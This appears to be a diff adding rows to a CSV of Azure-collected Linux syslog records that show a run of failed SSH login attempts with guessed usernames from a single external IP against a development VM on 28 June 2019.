+2393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:17,UbuntuDevEnv,2019-06-28 05:13:16,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 60601 ssh2,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,60601,,
+2394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:22,UbuntuDevEnv,2019-06-28 05:13:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:24,UbuntuDevEnv,2019-06-28 05:13:23,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 60601 ssh2,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,60601,,
+2396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:24,UbuntuDevEnv,2019-06-28 05:13:23,auth,UbuntuDevEnv,info,"Disconnecting invalid user 22 193.201.224.232 port 60601: Change of username or service not allowed: (22,ssh-connection) -> (266344,ssh-connection) [preauth]",92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,60601,,
+2397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:24,UbuntuDevEnv,2019-06-28 05:13:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:24,UbuntuDevEnv,2019-06-28 05:13:23,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:28,UbuntuDevEnv,2019-06-28 05:13:28,auth,UbuntuDevEnv,info,Invalid user 266344 from 193.201.224.232 port 38485,92681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,266344,193.201.224.2,38485,,
+2400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:30,UbuntuDevEnv,2019-06-28 05:13:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:30,UbuntuDevEnv,2019-06-28 05:13:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:32,UbuntuDevEnv,2019-06-28 05:13:31,auth,UbuntuDevEnv,info,Failed password for invalid user 266344 from 193.201.224.232 port 38485 ssh2,92681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,266344,193.201.224.2,38485,,
+2403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:32,UbuntuDevEnv,2019-06-28 05:13:31,auth,UbuntuDevEnv,info,"Disconnecting invalid user 266344 193.201.224.232 port 38485: Change of username or service not allowed: (266344,ssh-connection) -> (2Wire,ssh-connection) [preauth]",92681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,266344,193.201.224.2,38485,,
+2404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:37,UbuntuDevEnv,2019-06-28 05:13:36,auth,UbuntuDevEnv,info,Invalid user 2Wire from 193.201.224.232 port 7884,92712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2Wire,193.201.224.2,7884,,
+2405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:37,UbuntuDevEnv,2019-06-28 05:13:37,auth,UbuntuDevEnv,info,Failed none for invalid user 2Wire from 193.201.224.232 port 7884 ssh2,92712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2Wire,193.201.224.2,7884,,
+2406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:37,UbuntuDevEnv,2019-06-28 05:13:37,auth,UbuntuDevEnv,info,"Disconnecting invalid user 2Wire 193.201.224.232 port 7884: Change of username or service not allowed: (2Wire,ssh-connection) -> (3comcso,ssh-connection) [preauth]",92712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2Wire,193.201.224.2,7884,,
+2407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:42,UbuntuDevEnv,2019-06-28 05:13:41,auth,UbuntuDevEnv,info,Invalid user 3comcso from 193.201.224.232 port 13938,92734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,3comcso,193.201.224.2,13938,,
+2408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:42,UbuntuDevEnv,2019-06-28 05:13:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:42,UbuntuDevEnv,2019-06-28 05:13:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:44,UbuntuDevEnv,2019-06-28 05:13:43,auth,UbuntuDevEnv,info,Failed password for invalid user 3comcso from 193.201.224.232 port 13938 ssh2,92734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,3comcso,193.201.224.2,13938,,
+2411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:44,UbuntuDevEnv,2019-06-28 05:13:43,auth,UbuntuDevEnv,info,"Disconnecting invalid user 3comcso 193.201.224.232 port 13938: Change of username or service not allowed: (3comcso,ssh-connection) -> (a,ssh-connection) [preauth]",92734,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,3comcso,193.201.224.2,13938,,
+2412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:45,UbuntuDevEnv,2019-06-28 05:13:44,auth,UbuntuDevEnv,info,Invalid user a from 193.201.224.232 port 44079,92755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,193.201.224.2,44079,,
+2413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:45,UbuntuDevEnv,2019-06-28 05:13:45,auth,UbuntuDevEnv,info,Failed none for invalid user a from 193.201.224.232 port 44079 ssh2,92755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,193.201.224.2,44079,,
+2414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:45,UbuntuDevEnv,2019-06-28 05:13:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:45,UbuntuDevEnv,2019-06-28 05:13:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:47,UbuntuDevEnv,2019-06-28 05:13:46,auth,UbuntuDevEnv,info,Failed password for invalid user a from 193.201.224.232 port 44079 ssh2,92755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,193.201.224.2,44079,,
+2417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:47,UbuntuDevEnv,2019-06-28 05:13:46,auth,UbuntuDevEnv,info,"Disconnecting invalid user a 193.201.224.232 port 44079: Change of username or service not allowed: (a,ssh-connection) -> (aaa,ssh-connection) [preauth]",92755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,a,193.201.224.2,44079,,
+2418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:52,UbuntuDevEnv,2019-06-28 05:13:51,auth,UbuntuDevEnv,info,Invalid user aaa from 193.201.224.232 port 47955,92768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaa,193.201.224.2,47955,,
+2419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:52,UbuntuDevEnv,2019-06-28 05:13:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:52,UbuntuDevEnv,2019-06-28 05:13:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:54,UbuntuDevEnv,2019-06-28 05:13:53,auth,UbuntuDevEnv,info,Failed password for invalid user aaa from 193.201.224.232 port 47955 ssh2,92768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaa,193.201.224.2,47955,,
+2422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:56,UbuntuDevEnv,2019-06-28 05:13:56,auth,UbuntuDevEnv,info,"Disconnecting invalid user aaa 193.201.224.232 port 47955: Change of username or service not allowed: (aaa,ssh-connection) -> (acc,ssh-connection) [preauth]",92768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaa,193.201.224.2,47955,,
+2423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:01,UbuntuDevEnv,2019-06-28 05:14:00,auth,UbuntuDevEnv,info,Invalid user acc from 193.201.224.232 port 17862,92803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acc,193.201.224.2,17862,,
+2424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:02,UbuntuDevEnv,2019-06-28 05:14:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:02,UbuntuDevEnv,2019-06-28 05:14:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:04,UbuntuDevEnv,2019-06-28 05:14:03,auth,UbuntuDevEnv,info,Failed password for invalid user acc from 193.201.224.232 port 17862 ssh2,92803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acc,193.201.224.2,17862,,
+2427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:11,UbuntuDevEnv,2019-06-28 05:14:11,auth,UbuntuDevEnv,info,"Disconnecting invalid user acc 193.201.224.232 port 17862: Change of username or service not allowed: (acc,ssh-connection) -> (adam,ssh-connection) [preauth]",92803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acc,193.201.224.2,17862,,
+2428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:15,UbuntuDevEnv,2019-06-28 05:14:14,auth,UbuntuDevEnv,info,Invalid user adam from 193.201.224.232 port 58675,92858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adam,193.201.224.2,58675,,
+2429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:15,UbuntuDevEnv,2019-06-28 05:14:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:15,UbuntuDevEnv,2019-06-28 05:14:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:17,UbuntuDevEnv,2019-06-28 05:14:17,auth,UbuntuDevEnv,info,Failed password for invalid user adam from 193.201.224.232 port 58675 ssh2,92858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adam,193.201.224.2,58675,,
+2432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:22,UbuntuDevEnv,2019-06-28 05:14:22,auth,UbuntuDevEnv,info,"Disconnecting invalid user adam 193.201.224.232 port 58675: Change of username or service not allowed: (adam,ssh-connection) -> (adfexc,ssh-connection) [preauth]",92858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adam,193.201.224.2,58675,,
+2433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:24,UbuntuDevEnv,2019-06-28 05:14:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:24,UbuntuDevEnv,2019-06-28 05:14:23,auth,UbuntuDevEnv,info,Invalid user adfexc from 193.201.224.232 port 5699,92895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adfexc,193.201.224.2,5699,,
+2435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:24,UbuntuDevEnv,2019-06-28 05:14:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:26,UbuntuDevEnv,2019-06-28 05:14:25,auth,UbuntuDevEnv,info,Failed password for invalid user adfexc from 193.201.224.232 port 5699 ssh2,92895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adfexc,193.201.224.2,5699,,
+2437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:26,UbuntuDevEnv,2019-06-28 05:14:25,auth,UbuntuDevEnv,info,"Disconnecting invalid user adfexc 193.201.224.232 port 5699: Change of username or service not allowed: (adfexc,ssh-connection) -> (adm,ssh-connection) [preauth]",92895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adfexc,193.201.224.2,5699,,
+2438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:27,UbuntuDevEnv,2019-06-28 05:14:27,auth,UbuntuDevEnv,info,Invalid user adm from 193.201.224.232 port 34092,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:28,UbuntuDevEnv,2019-06-28 05:14:27,auth,UbuntuDevEnv,info,Failed none for invalid user adm from 193.201.224.232 port 34092 ssh2,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:28,UbuntuDevEnv,2019-06-28 05:14:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:28,UbuntuDevEnv,2019-06-28 05:14:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:30,UbuntuDevEnv,2019-06-28 05:14:29,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 34092 ssh2,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:30,UbuntuDevEnv,2019-06-28 05:14:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:32,UbuntuDevEnv,2019-06-28 05:14:32,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 34092 ssh2,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:32,UbuntuDevEnv,2019-06-28 05:14:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:34,UbuntuDevEnv,2019-06-28 05:14:34,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 34092 ssh2,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:34,UbuntuDevEnv,2019-06-28 05:14:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:37,UbuntuDevEnv,2019-06-28 05:14:36,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 34092 ssh2,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:39,UbuntuDevEnv,2019-06-28 05:14:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:41,UbuntuDevEnv,2019-06-28 05:14:40,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 34092 ssh2,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:41,UbuntuDevEnv,2019-06-28 05:14:40,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user adm from 193.201.224.232 port 34092 ssh2 [preauth],92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
